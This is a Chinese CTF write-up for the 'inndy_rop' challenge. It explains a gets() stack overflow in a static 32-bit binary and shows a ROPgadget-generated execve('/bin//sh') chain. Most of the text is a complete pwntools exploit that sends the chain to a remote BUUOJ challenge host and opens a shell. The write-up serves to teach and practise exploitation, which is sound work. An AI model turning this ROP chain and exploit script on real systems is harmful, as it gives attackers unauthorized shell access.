inndy_rop

C12en

2022-11-24

这一题以前没遇到过算是蛮新奇的所以记录下来还学到了ROPgadget的新用法

[*] '/home/chen/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

32位没有开启pie和canary

ida打开后发现只有一个简单的gets溢出的机会

int overflow()
{
  char v1[12]; // [esp+Ch] [ebp-Ch] BYREF

  return gets(v1);
}

并且这题是静态编译 ida打开会出现一大堆乱七八糟的函数静态编译没有调用libc函数所以这题也就不存在泄露libc然后获取system函数地址进行系统调用的做法了

那么这时候就需要用到ROPgadget其一个功能自动生成一串rop链

ROPgadget --binary file_name --ropchain

# Padding goes here
p = b''

p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

他已经自动帮我们生成好脚本了我们只需要手动加上偏移就可以pwn成功

但是这里需要注意你需要添加一个库如果没有这个库脚本会报错

Traceback (most recent call last):
  File "/home/chen/exp.py", line 51, in <module>
    p += pack('<I', 0x0806ecda) # pop edx ; ret
  File "/home/chen/.local/lib/python3.6/site-packages/pwnlib/util/packing.py", line 102, in pack
    if sign is None and number < 0:
TypeError: '<' not supported between instances of 'str' and 'int'

库:

from struct import pack

完整exp:

from pwn import*
from struct import pack

def libcmath(function_addr,function_name):
    libc_addr = function_addr - libc.sym[function_name]
    system_addr = libc_addr + libc.sym['system']
    binsh_addr = libc_addr + next(libc.search(b"/bin/sh"))
    return system_addr,binsh_addr

def csu(offset,gadget2_addr,call_addr,rdx,rsi,rdi,gadget1_addr,ret_addr):
    payload = cyclic(offset)
    payload += p64(gadget2_addr)
    payload += cyclic(0x8)
    payload += p64(0)
    payload += p64(1)
    payload += p64(call_addr)
    payload += p64(rdx)
    payload += p64(rsi)
    payload += p64(rdi)
    payload += p64(gadget1_addr)
    payload += cyclic(56)
    payload += p64(ret_addr)
    return payload

def localconnect(filename):
    io = process(filename)
    return io

def remoteconnect(ip,port):
    io = remote(ip,port)
    return io

def elf_libc(filename,libc_name):
    elf = ELF(filename)
    libc = ELF(libc_name)
    return elf,libc

def debug(button):
    if(button==1):
        context.log_level = "debug"

filename = 'pwn'
libc_name = 'buu_libc_ubuntu16_32'
ip="node4.buuoj.cn"
port=27246
elf,libc = elf_libc(filename,libc_name)


io = remoteconnect(ip,port)
debug(1)
p = b'a' * (0xc+0x4)
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80
io.sendline(p)
io.interactive()